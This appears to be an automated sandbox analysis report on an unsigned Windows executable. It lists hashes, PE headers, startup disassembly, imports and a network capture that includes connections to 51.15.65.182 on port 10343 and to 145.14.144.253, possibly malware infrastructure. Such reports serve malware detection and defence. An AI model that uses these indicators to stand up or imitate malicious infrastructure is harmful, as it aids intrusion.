                                                                                                                              SHA512:8696bcc429ceb8c2a8acb5e4c4d1f963eb5e6da41b9ede3365d9046cbc287e97809545e3204b714591111ac77b4d653ed3849fe61a67a8645ddcf1b5a067bc5a
                                                                                                                              SSDEEP:49152:tq+bulp7HM3wpNbmZTfpuentlEt4TNBKpjQBHYKiLz01AkC:tq+EZHM3AsZfpuulEt4TNBY0BeU1Ak
                                                                                                                              TLSH:CFC533CE9702E6FDD48438F2DC2D4E4F6D3A59801BA164E76FEB41A236909D4B071AD3
                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...P.+f.........."......|....'.....@..........@..............................(...........`........................................
                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                              Entrypoint:0x140001140
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x140000000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x662BB150 [Fri Apr 26 13:51:12 2024 UTC]
                                                                                                                              TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:6
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:6
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:6
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:de41d4e0545d977de6ca665131bb479a
                                                                                                                              Instruction
                                                                                                                              dec eax
                                                                                                                              sub esp, 28h
                                                                                                                              dec eax
                                                                                                                              mov eax, dword ptr [00007ED5h]
                                                                                                                              mov dword ptr [eax], 00000001h
                                                                                                                              call 00007F45608D02CFh
                                                                                                                              nop
                                                                                                                              nop
                                                                                                                              nop
                                                                                                                              dec eax
                                                                                                                              add esp, 28h
                                                                                                                              ret
                                                                                                                              nop
                                                                                                                              inc ecx
                                                                                                                              push edi
                                                                                                                              inc ecx
                                                                                                                              push esi
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              push ebx
                                                                                                                              dec eax
                                                                                                                              sub esp, 20h
                                                                                                                              dec eax
                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                              dec eax
                                                                                                                              mov edi, dword ptr [eax+08h]
                                                                                                                              dec eax
                                                                                                                              mov esi, dword ptr [00007EC9h]
                                                                                                                              xor eax, eax
                                                                                                                              dec eax
                                                                                                                              cmpxchg dword ptr [esi], edi
                                                                                                                              sete bl
                                                                                                                              je 00007F45608D02F0h
                                                                                                                              dec eax
                                                                                                                              cmp edi, eax
                                                                                                                              je 00007F45608D02EBh
                                                                                                                              dec esp
                                                                                                                              mov esi, dword ptr [000096F9h]
                                                                                                                              nop word ptr [eax+eax+00000000h]
                                                                                                                              mov ecx, 000003E8h
                                                                                                                              inc ecx
                                                                                                                              call esi
                                                                                                                              xor eax, eax
                                                                                                                              dec eax
                                                                                                                              cmpxchg dword ptr [esi], edi
                                                                                                                              sete bl
                                                                                                                              je 00007F45608D02C7h
                                                                                                                              dec eax
                                                                                                                              cmp edi, eax
                                                                                                                              jne 00007F45608D02A9h
                                                                                                                              dec eax
                                                                                                                              mov edi, dword ptr [00007E90h]
                                                                                                                              mov eax, dword ptr [edi]
                                                                                                                              cmp eax, 01h
                                                                                                                              jne 00007F45608D02CEh
                                                                                                                              mov ecx, 0000001Fh
                                                                                                                              call 00007F45608D7974h
                                                                                                                              jmp 00007F45608D02E9h
                                                                                                                              cmp dword ptr [edi], 00000000h
                                                                                                                              je 00007F45608D02CBh
                                                                                                                              mov byte ptr [00287279h], 00000001h
                                                                                                                              jmp 00007F45608D02DBh
                                                                                                                              mov dword ptr [edi], 00000001h
                                                                                                                              dec eax
                                                                                                                              mov ecx, dword ptr [00007E7Ah]
                                                                                                                              dec eax
                                                                                                                              mov edx, dword ptr [00007E7Bh]
                                                                                                                              call 00007F45608D796Bh
                                                                                                                              mov eax, dword ptr [edi]
                                                                                                                              cmp eax, 01h
                                                                                                                              jne 00007F45608D02DBh
                                                                                                                              dec eax
                                                                                                                              mov ecx, dword ptr [00007E50h]
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa5c80x3c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x28a0000x180.pdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x28d0000x78.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xa7600x158.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x7a060x7c009d9f8bb682b937c035f13e96723337edFalse0.5039692540322581data6.13815157151994IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x90000x1d100x1e008a6517b1f17167528235eb97e0671d23False0.45625zlib compressed data4.651620986057603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0xb0000x27e3e00x27d600fb34f235f6c9bf8a8ee5c842ea78ed56unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .pdata0x28a0000x1800x20048e1e807d559d162f3236974dfb1a03dFalse0.501953125data3.122656618370151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .00cfg0x28b0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .tls0x28c0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .reloc0x28d0000x780x2007fe9c2ef4789d0c3855af7315da04102False0.23046875data1.423525653940088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                              DLLImport
                                                                                                                              msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                                                                              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Apr 26, 2024 16:47:52.490684032 CEST49675443192.168.2.4173.222.162.32
                                                                                                                              Apr 26, 2024 16:48:02.099996090 CEST49675443192.168.2.4173.222.162.32
                                                                                                                              Apr 26, 2024 16:48:09.357991934 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358062029 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.358097076 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358112097 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.358139038 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358160973 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358211040 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358233929 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.358366013 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358402014 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358445883 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.358546019 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358716011 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.358730078 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.358995914 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.359026909 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.359169960 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.359181881 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.359538078 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.359589100 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.694075108 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.710840940 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.710855961 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.712970972 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.713046074 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.751235008 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.752388000 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.753504038 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.817795038 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.818173885 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.818280935 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.818314075 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.819502115 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.819513083 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.819551945 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.892267942 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.892438889 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.960119963 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.960474014 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.964118958 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.966051102 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.993451118 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.993453026 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:09.993477106 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:09.993485928 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.105153084 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.187109947 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.989608049 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.989653111 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.990566969 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.990629911 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.990715027 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.990780115 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.991961956 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.992024899 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.995131969 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.995193958 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.995661974 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.997356892 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.997427940 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.998387098 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.999600887 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.999608040 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:10.999684095 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:10.999710083 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.040139914 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.044126034 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.080079079 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.080122948 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.186665058 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.186945915 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.186989069 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.187011957 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.187300920 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.187345982 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.187352896 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.193027020 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.193073988 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.487490892 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.487616062 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.487647057 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.487689972 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.520658016 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.520772934 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.520819902 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.520884991 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.572654009 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.572788000 CEST44349736142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.572840929 CEST49736443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.610671997 CEST49733443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.610739946 CEST44349733142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.611134052 CEST49734443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.611144066 CEST44349734142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.611277103 CEST49735443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.611294985 CEST44349735142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.616044044 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.616080999 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.616142988 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.616539001 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.616575003 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.616631985 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.616794109 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.616810083 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.617022991 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.617032051 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.948406935 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.948658943 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.948676109 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.949139118 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.949562073 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.949652910 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:11.949709892 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:11.996123075 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.006325960 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.006596088 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.006609917 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.006923914 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.007282019 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.007334948 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.007452965 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.048115969 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279299021 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279341936 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279390097 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279388905 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.279416084 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279459953 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.279468060 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279479027 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.279515982 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.285994053 CEST49737443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.286005020 CEST44349737142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.396924019 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.396966934 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.397011995 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.397012949 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.397038937 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.397085905 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.397088051 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.397129059 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.397597075 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.397608042 CEST44349738142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:12.397619963 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:12.397674084 CEST49738443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:13.183697939 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:13.183758020 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:13.186842918 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:13.187038898 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:13.187068939 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:14.189949036 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:14.384968996 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:15.155550003 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:15.155575037 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:15.156094074 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:15.157289028 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:15.157356024 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:15.238543987 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:16.331569910 CEST49672443192.168.2.4173.222.162.32
                                                                                                                              Apr 26, 2024 16:48:16.331614017 CEST44349672173.222.162.32192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:16.422344923 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:16.422382116 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:16.422450066 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:16.424793005 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:16.424810886 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:17.122497082 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:17.122632980 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:17.126462936 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:17.126472950 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:17.126709938 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:17.192977905 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:21.436841011 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:21.484117031 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891537905 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891556978 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891566992 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891582966 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891586065 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891592979 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891638994 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:21.891675949 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891696930 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:21.891724110 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:21.891935110 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.891992092 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:21.891999006 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.892005920 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:21.892050028 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:22.193094015 CEST4972380192.168.2.4199.232.214.172
                                                                                                                              Apr 26, 2024 16:48:22.328998089 CEST8049723199.232.214.172192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:22.329039097 CEST8049723199.232.214.172192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:22.329099894 CEST4972380192.168.2.4199.232.214.172
                                                                                                                              Apr 26, 2024 16:48:22.403671980 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:22.403712034 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:22.403728008 CEST49744443192.168.2.440.127.169.103
                                                                                                                              Apr 26, 2024 16:48:22.403736115 CEST4434974440.127.169.103192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:23.564323902 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:23.564385891 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:23.564449072 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:23.787854910 CEST49741443192.168.2.4142.250.64.196
                                                                                                                              Apr 26, 2024 16:48:23.787883043 CEST44349741142.250.64.196192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:27.864658117 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:28.106591940 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:28.106709003 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:28.107147932 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:28.352910042 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:28.352937937 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:28.353010893 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:28.353813887 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:28.596926928 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:28.597204924 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:28.597263098 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:28.618175030 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:28.685652971 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:32.084573030 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.084639072 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.084707022 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.098217964 CEST49753443192.168.2.4145.14.144.253
                                                                                                                              Apr 26, 2024 16:48:32.098246098 CEST44349753145.14.144.253192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.140625000 CEST103434975251.15.65.182192.168.2.4
                                                                                                                              Apr 26, 2024 16:48:32.284015894 CEST4975210343192.168.2.451.15.65.182
                                                                                                                              Apr 26, 2024 16:48:32.406951904 CEST44349753145.14.144.253192.168.2.4
